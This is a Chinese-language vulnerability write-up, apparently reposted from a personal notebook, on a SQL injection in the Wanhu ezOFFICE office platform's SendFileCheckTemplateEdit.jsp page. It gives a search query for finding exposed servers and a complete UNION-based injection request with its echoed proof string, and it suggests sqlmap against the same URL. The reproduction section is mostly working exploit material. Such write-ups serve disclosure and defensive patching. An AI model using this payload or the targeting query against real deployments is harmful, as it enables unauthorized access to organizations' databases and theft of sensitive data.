登录 白背景

万户协同办公平台ezoffice SendFileCheckTemplateEdit 存在SQL注入漏洞

一、漏洞简介

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台ezoffice SendFileCheckTemplateEdit 存在SQL注入漏洞,攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息。

二、影响版本

  • 万户ezoffice

三、资产测绘

  • hunterapp.name="万户 Ezoffice OA"
  • 登录页面

image.png

四、漏洞复现

/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;xc?RecordID=1

image.png

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;xc?RecordID=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28117%29%2BCHAR%2877%29%2BCHAR%2899%29%2BCHAR%2886%29%2BCHAR%2873%29%2BCHAR%2865%29%2BCHAR%2866%29%2BCHAR%28117%29%2BCHAR%2897%29%2BCHAR%2867%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%2869%29%2BCHAR%2873%29%2BCHAR%28110%29%2BCHAR%2874%29%2BCHAR%28114%29%2BCHAR%2878%29%2BCHAR%2866%29%2BCHAR%28107%29%2BCHAR%2883%29%2BCHAR%28103%29%2BCHAR%2867%29%2BCHAR%2887%29%2BCHAR%2873%29%2BCHAR%2886%29%2BCHAR%2874%29%2BCHAR%2865%29%2BCHAR%2868%29%2BCHAR%28121%29%2BCHAR%2890%29%2BCHAR%2867%29%2BCHAR%28120%29%2BCHAR%2899%29%2BCHAR%2878%29%2BCHAR%28121%29%2BCHAR%2868%29%2BCHAR%28110%29%2BCHAR%2886%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL--+QHgO HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OASESSIONID=4E2455852565283AF1C96D72A82F0039; OASESSIONID=8CEBEFC17B098632FAECBAAFCFB50CE0; LocLan=zh_CN
Upgrade-Insecure-Requests: 1

image.png

qkzqquMcVIABuaCzqEInJrNBkSgCWIVJADyZCxcNyDnVzqvzkq

sqlmap

/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;xc?RecordID=1

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/vciebg73bth3somr